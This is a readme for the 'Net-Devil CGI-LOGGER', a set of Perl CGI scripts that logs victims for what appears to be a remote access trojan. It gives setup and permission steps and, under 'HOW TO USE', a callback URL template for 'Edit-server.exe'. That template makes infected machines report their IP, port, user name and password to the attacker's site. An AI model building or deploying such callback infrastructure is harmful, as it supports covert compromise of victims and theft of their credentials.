################################################################################
#             _   __     __       ____            _ __                         #
#            / | / /__  / /_     / __ \___ _   __(_) /                         #
#           /  |/ / _ \/ __/____/ / / / _ \ | / / / /                          #
#          / /|  /  __/ /_/____/ /_/ /  __/ |/ / / /                           #
#         /_/ |_/\___/\__/    /_____/\___/|___/_/_/   CGI-LOGGER v.1.0         #
#              				               	   written by Nilez    #
#                                                                              #
################################################################################

ABOUT
=====
The cgi-logger is a notification method that logs the victim's ip on your site.
Feel free to modify the script to your needs. 

CONFIGURE
=========
Before uploading the files you have to set a few settings.

- Path to Perl (in "log.cgi" and "list.cgi"):
   #!/usr/bin/perl (read the FAQ of your host to know where perl is located) 

- Password protect "list.cgi":
   $correctpass = "";  (e.g $correctpass = "the_password";)

- Full path to "list.cgi":
   $scriptlocation = ""; (e.g $scriptlocation = "http://www.yoursite.com/cgi-bin/list.cgi";)

- Maximum number of victim's:
   Find the line "while ($#list >= 149) {" in the "log.cgi", 149 stands for 150 
   lines maximum... Edit this to your needs. 

INSTALLATION
============

1. Upload the files to your CGI-BIN directory in ASCII mode.
2. CHMOD "log.cgi" and "list.cgi" to 755
3. CHMOD "log.txt" to 600


CHMOD755 | Owner | Group | Public       CHMOD600 | Owner | Group | Public
----------------------------------      ---------------------------------
Read     |   x   |   x   |   x	        Read     |   x   |       |
Write    |   x   |       | 	        Write    |   x   |       |
Execute  |   x   |   x   |   x          Execute  |       |       |



HOW TO USE
==========
In the "Edit-server.exe" you have to configure the path to the cgi script, 
e.g http://www,yoursite.com/cgi-bin/log.cgi" and also the attached data, this
is "?action=log&ip=*ip*&port=*port*&vicname=*vicname*&usrname=*usrname*&server=*server*&password=*password*"

Supported modifiers in attached data:
*ip*  = victim's ip.
*port* = port to connect to.
*vicname* = victim's name.
*usrname* = current logged on user.
*server* = server version.
*password* = the password.


C O N T A C T
=============
Don't mail me questions like "how do i CHMOD?" or "How do i upload in ASCII?" cause
i won't answer them, ask these questions on the net-devil forum, if this question 
isn't asked on the forum before you got a big chance that i'll or someone else answers, 
sorry but this is just to prevent i turn in to a help-desk loser =)

Website: http://www.net-devil.f2s.com
Email: nilez@mail.com
ICQ: 76950838
 